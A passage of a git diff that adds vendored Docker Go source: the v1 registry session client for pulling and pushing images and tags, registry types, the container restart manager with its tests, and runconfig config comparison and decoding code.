+func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Named, askedTag string) (string, error) {
+	repository := repositoryRef.RemoteName()
+
+	if strings.Count(repository, "/") == 0 {
+		// This will be removed once the registry supports auto-resolution on
+		// the "library" namespace
+		repository = "library/" + repository
+	}
+	for _, host := range registries {
+		endpoint := fmt.Sprintf("%srepositories/%s/tags/%s", host, repository, askedTag)
+		res, err := r.client.Get(endpoint)
+		if err != nil {
+			return "", err
+		}
+
+		logrus.Debugf("Got status code %d from %s", res.StatusCode, endpoint)
+		defer res.Body.Close()
+
+		if res.StatusCode == 404 {
+			return "", ErrRepoNotFound
+		}
+		if res.StatusCode != 200 {
+			continue
+		}
+
+		var tagID string
+		if err := json.NewDecoder(res.Body).Decode(&tagID); err != nil {
+			return "", err
+		}
+		return tagID, nil
+	}
+	return "", fmt.Errorf("Could not reach any registry endpoint")
+}
+
+// GetRemoteTags retrieves all tags from the given repository. It queries each
+// of the registries supplied in the registries argument, and returns data from
+// the first one that answers the query successfully. It returns a map with
+// tag names as the keys and image IDs as the values.
+func (r *Session) GetRemoteTags(registries []string, repositoryRef reference.Named) (map[string]string, error) {
+	repository := repositoryRef.RemoteName()
+
+	if strings.Count(repository, "/") == 0 {
+		// This will be removed once the registry supports auto-resolution on
+		// the "library" namespace
+		repository = "library/" + repository
+	}
+	for _, host := range registries {
+		endpoint := fmt.Sprintf("%srepositories/%s/tags", host, repository)
+		res, err := r.client.Get(endpoint)
+		if err != nil {
+			return nil, err
+		}
+
+		logrus.Debugf("Got status code %d from %s", res.StatusCode, endpoint)
+		defer res.Body.Close()
+
+		if res.StatusCode == 404 {
+			return nil, ErrRepoNotFound
+		}
+		if res.StatusCode != 200 {
+			continue
+		}
+
+		result := make(map[string]string)
+		if err := json.NewDecoder(res.Body).Decode(&result); err != nil {
+			return nil, err
+		}
+		return result, nil
+	}
+	return nil, fmt.Errorf("Could not reach any registry endpoint")
+}
+
+func buildEndpointsList(headers []string, indexEp string) ([]string, error) {
+	var endpoints []string
+	parsedURL, err := url.Parse(indexEp)
+	if err != nil {
+		return nil, err
+	}
+	var urlScheme = parsedURL.Scheme
+	// The registry's URL scheme has to match the Index'
+	for _, ep := range headers {
+		epList := strings.Split(ep, ",")
+		for _, epListElement := range epList {
+			endpoints = append(
+				endpoints,
+				fmt.Sprintf("%s://%s/v1/", urlScheme, strings.TrimSpace(epListElement)))
+		}
+	}
+	return endpoints, nil
+}
+
+// GetRepositoryData returns lists of images and endpoints for the repository
+func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, error) {
+	repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), name.RemoteName())
+
+	logrus.Debugf("[registry] Calling GET %s", repositoryTarget)
+
+	req, err := http.NewRequest("GET", repositoryTarget, nil)
+	if err != nil {
+		return nil, err
+	}
+	// this will set basic auth in r.client.Transport and send cached X-Docker-Token headers for all subsequent requests
+	req.Header.Set("X-Docker-Token", "true")
+	res, err := r.client.Do(req)
+	if err != nil {
+		// check if the error is because of i/o timeout
+		// and return a non-obtuse error message for users
+		// "Get https://index.docker.io/v1/repositories/library/busybox/images: i/o timeout"
+		// was a top search on the docker user forum
+		if isTimeout(err) {
+			return nil, fmt.Errorf("Network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy.", repositoryTarget)
+		}
+		return nil, fmt.Errorf("Error while pulling image: %v", err)
+	}
+	defer res.Body.Close()
+	if res.StatusCode == 401 {
+		return nil, errcode.ErrorCodeUnauthorized.WithArgs()
+	}
+	// TODO: Right now we're ignoring checksums in the response body.
+	// In the future, we need to use them to check image validity.
+	if res.StatusCode == 404 {
+		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res)
+	} else if res.StatusCode != 200 {
+		errBody, err := ioutil.ReadAll(res.Body)
+		if err != nil {
+			logrus.Debugf("Error reading response body: %s", err)
+		}
+		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, name.RemoteName(), errBody), res)
+	}
+
+	var endpoints []string
+	if res.Header.Get("X-Docker-Endpoints") != "" {
+		endpoints, err = buildEndpointsList(res.Header["X-Docker-Endpoints"], r.indexEndpoint.String())
+		if err != nil {
+			return nil, err
+		}
+	} else {
+		// Assume the endpoint is on the same host
+		endpoints = append(endpoints, fmt.Sprintf("%s://%s/v1/", r.indexEndpoint.URL.Scheme, req.URL.Host))
+	}
+
+	remoteChecksums := []*ImgData{}
+	if err := json.NewDecoder(res.Body).Decode(&remoteChecksums); err != nil {
+		return nil, err
+	}
+
+	// Forge a better object from the retrieved data
+	imgsData := make(map[string]*ImgData, len(remoteChecksums))
+	for _, elem := range remoteChecksums {
+		imgsData[elem.ID] = elem
+	}
+
+	return &RepositoryData{
+		ImgList:   imgsData,
+		Endpoints: endpoints,
+	}, nil
+}
+
+// PushImageChecksumRegistry uploads checksums for an image
+func (r *Session) PushImageChecksumRegistry(imgData *ImgData, registry string) error {
+	u := registry + "images/" + imgData.ID + "/checksum"
+
+	logrus.Debugf("[registry] Calling PUT %s", u)
+
+	req, err := http.NewRequest("PUT", u, nil)
+	if err != nil {
+		return err
+	}
+	req.Header.Set("X-Docker-Checksum", imgData.Checksum)
+	req.Header.Set("X-Docker-Checksum-Payload", imgData.ChecksumPayload)
+
+	res, err := r.client.Do(req)
+	if err != nil {
+		return fmt.Errorf("Failed to upload metadata: %v", err)
+	}
+	defer res.Body.Close()
+	if len(res.Cookies()) > 0 {
+		r.client.Jar.SetCookies(req.URL, res.Cookies())
+	}
+	if res.StatusCode != 200 {
+		errBody, err := ioutil.ReadAll(res.Body)
+		if err != nil {
+			return fmt.Errorf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err)
+		}
+		var jsonBody map[string]string
+		if err := json.Unmarshal(errBody, &jsonBody); err != nil {
+			errBody = []byte(err.Error())
+		} else if jsonBody["error"] == "Image already exists" {
+			return ErrAlreadyExists
+		}
+		return fmt.Errorf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody)
+	}
+	return nil
+}
+
+// PushImageJSONRegistry pushes JSON metadata for a local image to the registry
+func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, registry string) error {
+
+	u := registry + "images/" + imgData.ID + "/json"
+
+	logrus.Debugf("[registry] Calling PUT %s", u)
+
+	req, err := http.NewRequest("PUT", u, bytes.NewReader(jsonRaw))
+	if err != nil {
+		return err
+	}
+	req.Header.Add("Content-type", "application/json")
+
+	res, err := r.client.Do(req)
+	if err != nil {
+		return fmt.Errorf("Failed to upload metadata: %s", err)
+	}
+	defer res.Body.Close()
+	if res.StatusCode == 401 && strings.HasPrefix(registry, "http://") {
+		return httputils.NewHTTPRequestError("HTTP code 401, Docker will not send auth headers over HTTP.", res)
+	}
+	if res.StatusCode != 200 {
+		errBody, err := ioutil.ReadAll(res.Body)
+		if err != nil {
+			return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res)
+		}
+		var jsonBody map[string]string
+		if err := json.Unmarshal(errBody, &jsonBody); err != nil {
+			errBody = []byte(err.Error())
+		} else if jsonBody["error"] == "Image already exists" {
+			return ErrAlreadyExists
+		}
+		return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res)
+	}
+	return nil
+}
+
+// PushImageLayerRegistry sends the checksum of an image layer to the registry
+func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry string, jsonRaw []byte) (checksum string, checksumPayload string, err error) {
+	u := registry + "images/" + imgID + "/layer"
+
+	logrus.Debugf("[registry] Calling PUT %s", u)
+
+	tarsumLayer, err := tarsum.NewTarSum(layer, false, tarsum.Version0)
+	if err != nil {
+		return "", "", err
+	}
+	h := sha256.New()
+	h.Write(jsonRaw)
+	h.Write([]byte{'\n'})
+	checksumLayer := io.TeeReader(tarsumLayer, h)
+
+	req, err := http.NewRequest("PUT", u, checksumLayer)
+	if err != nil {
+		return "", "", err
+	}
+	req.Header.Add("Content-Type", "application/octet-stream")
+	req.ContentLength = -1
+	req.TransferEncoding = []string{"chunked"}
+	res, err := r.client.Do(req)
+	if err != nil {
+		return "", "", fmt.Errorf("Failed to upload layer: %v", err)
+	}
+	if rc, ok := layer.(io.Closer); ok {
+		if err := rc.Close(); err != nil {
+			return "", "", err
+		}
+	}
+	defer res.Body.Close()
+
+	if res.StatusCode != 200 {
+		errBody, err := ioutil.ReadAll(res.Body)
+		if err != nil {
+			return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res)
+		}
+		return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res)
+	}
+
+	checksumPayload = "sha256:" + hex.EncodeToString(h.Sum(nil))
+	return tarsumLayer.Sum(jsonRaw), checksumPayload, nil
+}
+
+// PushRegistryTag pushes a tag on the registry.
+// Remote has the format '<user>/<repo>
+func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registry string) error {
+	// "jsonify" the string
+	revision = "\"" + revision + "\""
+	path := fmt.Sprintf("repositories/%s/tags/%s", remote.RemoteName(), tag)
+
+	req, err := http.NewRequest("PUT", registry+path, strings.NewReader(revision))
+	if err != nil {
+		return err
+	}
+	req.Header.Add("Content-type", "application/json")
+	req.ContentLength = int64(len(revision))
+	res, err := r.client.Do(req)
+	if err != nil {
+		return err
+	}
+	res.Body.Close()
+	if res.StatusCode != 200 && res.StatusCode != 201 {
+		return httputils.NewHTTPRequestError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, remote.RemoteName()), res)
+	}
+	return nil
+}
+
+// PushImageJSONIndex uploads an image list to the repository
+func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, validate bool, regs []string) (*RepositoryData, error) {
+	cleanImgList := []*ImgData{}
+	if validate {
+		for _, elem := range imgList {
+			if elem.Checksum != "" {
+				cleanImgList = append(cleanImgList, elem)
+			}
+		}
+	} else {
+		cleanImgList = imgList
+	}
+
+	imgListJSON, err := json.Marshal(cleanImgList)
+	if err != nil {
+		return nil, err
+	}
+	var suffix string
+	if validate {
+		suffix = "images"
+	}
+	u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), remote.RemoteName(), suffix)
+	logrus.Debugf("[registry] PUT %s", u)
+	logrus.Debugf("Image list pushed to index:\n%s", imgListJSON)
+	headers := map[string][]string{
+		"Content-type": {"application/json"},
+		// this will set basic auth in r.client.Transport and send cached X-Docker-Token headers for all subsequent requests
+		"X-Docker-Token": {"true"},
+	}
+	if validate {
+		headers["X-Docker-Endpoints"] = regs
+	}
+
+	// Redirect if necessary
+	var res *http.Response
+	for {
+		if res, err = r.putImageRequest(u, headers, imgListJSON); err != nil {
+			return nil, err
+		}
+		if !shouldRedirect(res) {
+			break
+		}
+		res.Body.Close()
+		u = res.Header.Get("Location")
+		logrus.Debugf("Redirected to %s", u)
+	}
+	defer res.Body.Close()
+
+	if res.StatusCode == 401 {
+		return nil, errcode.ErrorCodeUnauthorized.WithArgs()
+	}
+
+	var tokens, endpoints []string
+	if !validate {
+		if res.StatusCode != 200 && res.StatusCode != 201 {
+			errBody, err := ioutil.ReadAll(res.Body)
+			if err != nil {
+				logrus.Debugf("Error reading response body: %s", err)
+			}
+			return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, remote.RemoteName(), errBody), res)
+		}
+		tokens = res.Header["X-Docker-Token"]
+		logrus.Debugf("Auth token: %v", tokens)
+
+		if res.Header.Get("X-Docker-Endpoints") == "" {
+			return nil, fmt.Errorf("Index response didn't contain any endpoints")
+		}
+		endpoints, err = buildEndpointsList(res.Header["X-Docker-Endpoints"], r.indexEndpoint.String())
+		if err != nil {
+			return nil, err
+		}
+	} else {
+		if res.StatusCode != 204 {
+			errBody, err := ioutil.ReadAll(res.Body)
+			if err != nil {
+				logrus.Debugf("Error reading response body: %s", err)
+			}
+			return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, remote.RemoteName(), errBody), res)
+		}
+	}
+
+	return &RepositoryData{
+		Endpoints: endpoints,
+	}, nil
+}
+
+func (r *Session) putImageRequest(u string, headers map[string][]string, body []byte) (*http.Response, error) {
+	req, err := http.NewRequest("PUT", u, bytes.NewReader(body))
+	if err != nil {
+		return nil, err
+	}
+	req.ContentLength = int64(len(body))
+	for k, v := range headers {
+		req.Header[k] = v
+	}
+	response, err := r.client.Do(req)
+	if err != nil {
+		return nil, err
+	}
+	return response, nil
+}
+
+func shouldRedirect(response *http.Response) bool {
+	return response.StatusCode >= 300 && response.StatusCode < 400
+}
+
+// SearchRepositories performs a search against the remote repository
+func (r *Session) SearchRepositories(term string, limit int) (*registrytypes.SearchResults, error) {
+	if limit < 1 || limit > 100 {
+		return nil, fmt.Errorf("Limit %d is outside the range of [1, 100]", limit)
+	}
+	logrus.Debugf("Index server: %s", r.indexEndpoint)
+	u := r.indexEndpoint.String() + "search?q=" + url.QueryEscape(term) + "&n=" + url.QueryEscape(fmt.Sprintf("%d", limit))
+
+	req, err := http.NewRequest("GET", u, nil)
+	if err != nil {
+		return nil, fmt.Errorf("Error while getting from the server: %v", err)
+	}
+	// Have the AuthTransport send authentication, when logged in.
+	req.Header.Set("X-Docker-Token", "true")
+	res, err := r.client.Do(req)
+	if err != nil {
+		return nil, err
+	}
+	defer res.Body.Close()
+	if res.StatusCode != 200 {
+		return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res)
+	}
+	result := new(registrytypes.SearchResults)
+	return result, json.NewDecoder(res.Body).Decode(result)
+}
+
+// GetAuthConfig returns the authentication settings for a session
+// TODO(tiborvass): remove this once registry client v2 is vendored
+func (r *Session) GetAuthConfig(withPasswd bool) *types.AuthConfig {
+	password := ""
+	if withPasswd {
+		password = r.authConfig.Password
+	}
+	return &types.AuthConfig{
+		Username: r.authConfig.Username,
+		Password: password,
+	}
+}
+
+func isTimeout(err error) bool {
+	type timeout interface {
+		Timeout() bool
+	}
+	e := err
+	switch urlErr := err.(type) {
+	case *url.Error:
+		e = urlErr.Err
+	}
+	t, ok := e.(timeout)
+	return ok && t.Timeout()
+}
diff --git a/vendor/github.com/docker/docker/registry/types.go b/vendor/github.com/docker/docker/registry/types.go
new file mode 100644
index 0000000000..49c123a3e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/types.go
@@ -0,0 +1,73 @@
+package registry
+
+import (
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/reference"
+)
+
+// RepositoryData tracks the image list, list of endpoints, and list of tokens
+// for a repository
+type RepositoryData struct {
+	// ImgList is a list of images in the repository
+	ImgList map[string]*ImgData
+	// Endpoints is a list of endpoints returned in X-Docker-Endpoints
+	Endpoints []string
+	// Tokens is currently unused (remove it?)
+	Tokens []string
+}
+
+// ImgData is used to transfer image checksums to and from the registry
+type ImgData struct {
+	// ID is an opaque string that identifies the image
+	ID              string `json:"id"`
+	Checksum        string `json:"checksum,omitempty"`
+	ChecksumPayload string `json:"-"`
+	Tag             string `json:",omitempty"`
+}
+
+// PingResult contains the information returned when pinging a registry. It
+// indicates the registry's version and whether the registry claims to be a
+// standalone registry.
+type PingResult struct {
+	// Version is the registry version supplied by the registry in an HTTP
+	// header
+	Version string `json:"version"`
+	// Standalone is set to true if the registry indicates it is a
+	// standalone registry in the X-Docker-Registry-Standalone
+	// header
+	Standalone bool `json:"standalone"`
+}
+
+// APIVersion is an integral representation of an API version (presently
+// either 1 or 2)
+type APIVersion int
+
+func (av APIVersion) String() string {
+	return apiVersions[av]
+}
+
+// API Version identifiers.
+const (
+	_                      = iota
+	APIVersion1 APIVersion = iota
+	APIVersion2
+)
+
+var apiVersions = map[APIVersion]string{
+	APIVersion1: "v1",
+	APIVersion2: "v2",
+}
+
+// RepositoryInfo describes a repository
+type RepositoryInfo struct {
+	reference.Named
+	// Index points to registry information
+	Index *registrytypes.IndexInfo
+	// Official indicates whether the repository is considered official.
+	// If the registry is official, and the normalized name does not
+	// contain a '/' (e.g. "foo"), then it is considered an official repo.
+	Official bool
+	// Class represents the class of the repository, such as "plugin"
+	// or "image".
+	Class string
+}
diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager.go b/vendor/github.com/docker/docker/restartmanager/restartmanager.go
new file mode 100644
index 0000000000..570fc93802
--- /dev/null
+++ b/vendor/github.com/docker/docker/restartmanager/restartmanager.go
@@ -0,0 +1,128 @@
+package restartmanager
+
+import (
+	"errors"
+	"fmt"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+)
+
+const (
+	backoffMultiplier = 2
+	defaultTimeout    = 100 * time.Millisecond
+)
+
+// ErrRestartCanceled is returned when the restart manager has been
+// canceled and will no longer restart the container.
+var ErrRestartCanceled = errors.New("restart canceled")
+
+// RestartManager defines object that controls container restarting rules.
+type RestartManager interface {
+	Cancel() error
+	ShouldRestart(exitCode uint32, hasBeenManuallyStopped bool, executionDuration time.Duration) (bool, chan error, error)
+}
+
+type restartManager struct {
+	sync.Mutex
+	sync.Once
+	policy       container.RestartPolicy
+	restartCount int
+	timeout      time.Duration
+	active       bool
+	cancel       chan struct{}
+	canceled     bool
+}
+
+// New returns a new restartmanager based on a policy.
+func New(policy container.RestartPolicy, restartCount int) RestartManager {
+	return &restartManager{policy: policy, restartCount: restartCount, cancel: make(chan struct{})}
+}
+
+func (rm *restartManager) SetPolicy(policy container.RestartPolicy) {
+	rm.Lock()
+	rm.policy = policy
+	rm.Unlock()
+}
+
+func (rm *restartManager) ShouldRestart(exitCode uint32, hasBeenManuallyStopped bool, executionDuration time.Duration) (bool, chan error, error) {
+	if rm.policy.IsNone() {
+		return false, nil, nil
+	}
+	rm.Lock()
+	unlockOnExit := true
+	defer func() {
+		if unlockOnExit {
+			rm.Unlock()
+		}
+	}()
+
+	if rm.canceled {
+		return false, nil, ErrRestartCanceled
+	}
+
+	if rm.active {
+		return false, nil, fmt.Errorf("invalid call on active restartmanager")
+	}
+	// if the container ran for more than 10s, regardless of status and policy reset the
+	// the timeout back to the default.
+	if executionDuration.Seconds() >= 10 {
+		rm.timeout = 0
+	}
+	if rm.timeout == 0 {
+		rm.timeout = defaultTimeout
+	} else {
+		rm.timeout *= backoffMultiplier
+	}
+
+	var restart bool
+	switch {
+	case rm.policy.IsAlways():
+		restart = true
+	case rm.policy.IsUnlessStopped() && !hasBeenManuallyStopped:
+		restart = true
+	case rm.policy.IsOnFailure():
+		// the default value of 0 for MaximumRetryCount means that we will not enforce a maximum count
+		if max := rm.policy.MaximumRetryCount; max == 0 || rm.restartCount < max {
+			restart = exitCode != 0
+		}
+	}
+
+	if !restart {
+		rm.active = false
+		return false, nil, nil
+	}
+
+	rm.restartCount++
+
+	unlockOnExit = false
+	rm.active = true
+	rm.Unlock()
+
+	ch := make(chan error)
+	go func() {
+		select {
+		case <-rm.cancel:
+			ch <- ErrRestartCanceled
+			close(ch)
+		case <-time.After(rm.timeout):
+			rm.Lock()
+			close(ch)
+			rm.active = false
+			rm.Unlock()
+		}
+	}()
+
+	return true, ch, nil
+}
+
+func (rm *restartManager) Cancel() error {
+	rm.Do(func() {
+		rm.Lock()
+		rm.canceled = true
+		close(rm.cancel)
+		rm.Unlock()
+	})
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go
new file mode 100644
index 0000000000..20eced54d3
--- /dev/null
+++ b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go
@@ -0,0 +1,34 @@
+package restartmanager
+
+import (
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+)
+
+func TestRestartManagerTimeout(t *testing.T) {
+	rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager)
+	should, _, err := rm.ShouldRestart(0, false, 1*time.Second)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !should {
+		t.Fatal("container should be restarted")
+	}
+	if rm.timeout != 100*time.Millisecond {
+		t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout)
+	}
+}
+
+func TestRestartManagerTimeoutReset(t *testing.T) {
+	rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager)
+	rm.timeout = 5 * time.Second
+	_, _, err := rm.ShouldRestart(0, false, 10*time.Second)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if rm.timeout != 100*time.Millisecond {
+		t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout)
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/compare.go b/vendor/github.com/docker/docker/runconfig/compare.go
new file mode 100644
index 0000000000..708922f986
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/compare.go
@@ -0,0 +1,61 @@
+package runconfig
+
+import "github.com/docker/docker/api/types/container"
+
+// Compare two Config struct. Do not compare the "Image" nor "Hostname" fields
+// If OpenStdin is set, then it differs
+func Compare(a, b *container.Config) bool {
+	if a == nil || b == nil ||
+		a.OpenStdin || b.OpenStdin {
+		return false
+	}
+	if a.AttachStdout != b.AttachStdout ||
+		a.AttachStderr != b.AttachStderr ||
+		a.User != b.User ||
+		a.OpenStdin != b.OpenStdin ||
+		a.Tty != b.Tty {
+		return false
+	}
+
+	if len(a.Cmd) != len(b.Cmd) ||
+		len(a.Env) != len(b.Env) ||
+		len(a.Labels) != len(b.Labels) ||
+		len(a.ExposedPorts) != len(b.ExposedPorts) ||
+		len(a.Entrypoint) != len(b.Entrypoint) ||
+		len(a.Volumes) != len(b.Volumes) {
+		return false
+	}
+
+	for i := 0; i < len(a.Cmd); i++ {
+		if a.Cmd[i] != b.Cmd[i] {
+			return false
+		}
+	}
+	for i := 0; i < len(a.Env); i++ {
+		if a.Env[i] != b.Env[i] {
+			return false
+		}
+	}
+	for k, v := range a.Labels {
+		if v != b.Labels[k] {
+			return false
+		}
+	}
+	for k := range a.ExposedPorts {
+		if _, exists := b.ExposedPorts[k]; !exists {
+			return false
+		}
+	}
+
+	for i := 0; i < len(a.Entrypoint); i++ {
+		if a.Entrypoint[i] != b.Entrypoint[i] {
+			return false
+		}
+	}
+	for key := range a.Volumes {
+		if _, exists := b.Volumes[key]; !exists {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/runconfig/compare_test.go b/vendor/github.com/docker/docker/runconfig/compare_test.go
new file mode 100644
index 0000000000..6370d7a887
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/compare_test.go
@@ -0,0 +1,126 @@
+package runconfig
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/go-connections/nat"
+)
+
+// Just to make life easier
+func newPortNoError(proto, port string) nat.Port {
+	p, _ := nat.NewPort(proto, port)
+	return p
+}
+
+func TestCompare(t *testing.T) {
+	ports1 := make(nat.PortSet)
+	ports1[newPortNoError("tcp", "1111")] = struct{}{}
+	ports1[newPortNoError("tcp", "2222")] = struct{}{}
+	ports2 := make(nat.PortSet)
+	ports2[newPortNoError("tcp", "3333")] = struct{}{}
+	ports2[newPortNoError("tcp", "4444")] = struct{}{}
+	ports3 := make(nat.PortSet)
+	ports3[newPortNoError("tcp", "1111")] = struct{}{}
+	ports3[newPortNoError("tcp", "2222")] = struct{}{}
+	ports3[newPortNoError("tcp", "5555")] = struct{}{}
+	volumes1 := make(map[string]struct{})
+	volumes1["/test1"] = struct{}{}
+	volumes2 := make(map[string]struct{})
+	volumes2["/test2"] = struct{}{}
+	volumes3 := make(map[string]struct{})
+	volumes3["/test1"] = struct{}{}
+	volumes3["/test3"] = struct{}{}
+	envs1 := []string{"ENV1=value1", "ENV2=value2"}
+	envs2 := []string{"ENV1=value1", "ENV3=value3"}
+	entrypoint1 := strslice.StrSlice{"/bin/sh", "-c"}
+	entrypoint2 := strslice.StrSlice{"/bin/sh", "-d"}
+	entrypoint3 := strslice.StrSlice{"/bin/sh", "-c", "echo"}
+	cmd1 := strslice.StrSlice{"/bin/sh", "-c"}
+	cmd2 := strslice.StrSlice{"/bin/sh", "-d"}
+	cmd3 := strslice.StrSlice{"/bin/sh", "-c", "echo"}
+	labels1 := map[string]string{"LABEL1": "value1", "LABEL2": "value2"}
+	labels2 := map[string]string{"LABEL1": "value1", "LABEL2": "value3"}
+	labels3 := map[string]string{"LABEL1": "value1", "LABEL2": "value2", "LABEL3": "value3"}
+
+	sameConfigs := map[*container.Config]*container.Config{
+		// Empty config
+		&container.Config{}: {},
+		// Does not compare hostname, domainname & image
+		&container.Config{
+			Hostname:   "host1",
+			Domainname: "domain1",
+			Image:      "image1",
+			User:       "user",
+		}: {
+			Hostname:   "host2",
+			Domainname: "domain2",
+			Image:      "image2",
+			User:       "user",
+		},
+		// only OpenStdin
+		&container.Config{OpenStdin: false}: {OpenStdin: false},
+		// only env
+		&container.Config{Env: envs1}: {Env: envs1},
+		// only cmd
+		&container.Config{Cmd: cmd1}: {Cmd: cmd1},
+		// only labels
+		&container.Config{Labels: labels1}: {Labels: labels1},
+		// only exposedPorts
+		&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports1},
+		// only entrypoints
+		&container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint1},
+		// only volumes
+		&container.Config{Volumes: volumes1}: {Volumes: volumes1},
+	}
+	differentConfigs := map[*container.Config]*container.Config{
+		nil: nil,
+		&container.Config{
+			Hostname:   "host1",
+			Domainname: "domain1",
+			Image:      "image1",
+			User:       "user1",
+		}: {
+			Hostname:   "host1",
+			Domainname: "domain1",
+			Image:      "image1",
+			User:       "user2",
+		},
+		// only OpenStdin
+		&container.Config{OpenStdin: false}: {OpenStdin: true},
+		&container.Config{OpenStdin: true}:  {OpenStdin: false},
+		// only env
+		&container.Config{Env: envs1}: {Env: envs2},
+		// only cmd
+		&container.Config{Cmd: cmd1}: {Cmd: cmd2},
+		// not the same number of parts
+		&container.Config{Cmd: cmd1}: {Cmd: cmd3},
+		// only labels
+		&container.Config{Labels: labels1}: {Labels: labels2},
+		// not the same number of labels
+		&container.Config{Labels: labels1}: {Labels: labels3},
+		// only exposedPorts
+		&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports2},
+		// not the same number of ports
+		&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports3},
+		// only entrypoints
+		&container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2},
+		// not the same number of parts
+		&container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3},
+		// only volumes
+		&container.Config{Volumes: volumes1}: {Volumes: volumes2},
+		// not the same number of labels
+		&container.Config{Volumes: volumes1}: {Volumes: volumes3},
+	}
+	for config1, config2 := range sameConfigs {
+		if !Compare(config1, config2) {
+			t.Fatalf("Compare should be true for [%v] and [%v]", config1, config2)
+		}
+	}
+	for config1, config2 := range differentConfigs {
+		if Compare(config1, config2) {
+			t.Fatalf("Compare should be false for [%v] and [%v]", config1, config2)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/config.go b/vendor/github.com/docker/docker/runconfig/config.go
new file mode 100644
index 0000000000..508681cfe0
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/config.go
@@ -0,0 +1,97 @@
+package runconfig
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/volume"
+)
+
+// ContainerDecoder implements httputils.ContainerDecoder
+// calling DecodeContainerConfig.
+type ContainerDecoder struct{}
+
+// DecodeConfig makes ContainerDecoder to implement httputils.ContainerDecoder
+func (r ContainerDecoder) DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
+	return DecodeContainerConfig(src)
+}
+
+// DecodeHostConfig makes ContainerDecoder to implement httputils.ContainerDecoder
+func (r ContainerDecoder) DecodeHostConfig(src io.Reader) (*container.HostConfig, error) {
+	return DecodeHostConfig(src)
+}
+
+// DecodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper
+// struct and returns both a Config and a HostConfig struct
+// Be aware this function is not checking whether the resulted structs are nil,
+// it's your business to do so
+func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
+	var w ContainerConfigWrapper
+
+	decoder := json.NewDecoder(src)
+	if err := decoder.Decode(&w); err != nil {
+		return nil, nil, nil, err
+	}
+
+	hc := w.getHostConfig()
+
+	// Perform platform-specific processing of Volumes and Binds.
+	if w.Config != nil && hc != nil {
+
+		// Initialize the volumes map if currently nil
+		if w.Config.Volumes == nil {
+			w.Config.Volumes = make(map[string]struct{})
+		}
+
+		// Now validate all the volumes and binds
+		if err := validateMountSettings(w.Config, hc); err != nil {
+			return nil, nil, nil, err
+		}
+	}
+
+	// Certain parameters need daemon-side validation that cannot be done
+	// on the client, as only the daemon knows what is valid for the platform.
+	if err := ValidateNetMode(w.Config, hc); err != nil {
+		return nil, nil, nil, err
+	}
+
+	// Validate isolation
+	if err := ValidateIsolation(hc); err != nil {
+		return nil, nil, nil, err
+	}
+
+	// Validate QoS
+	if err := ValidateQoS(hc); err != nil {
+		return nil, nil, nil, err
+	}
+
+	// Validate Resources
+	if err := ValidateResources(hc, sysinfo.New(true)); err != nil {
+		return nil, nil, nil, err
+	}
+	return w.Config, hc, w.NetworkingConfig, nil
+}
+
